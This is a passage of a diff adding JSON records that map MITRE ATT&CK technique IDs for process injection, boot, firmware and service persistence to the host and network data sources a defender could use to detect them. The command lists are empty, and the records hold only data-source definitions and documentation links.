], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1055.009", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1055.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1037.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1543", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1542.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1542.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver metadata", + "description": "Data and information that describe a driver and activity around it such as driver issues reporting and driver integrity (Page hash, code) checking.", + "source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "driver" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1542.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1505.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1542", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": 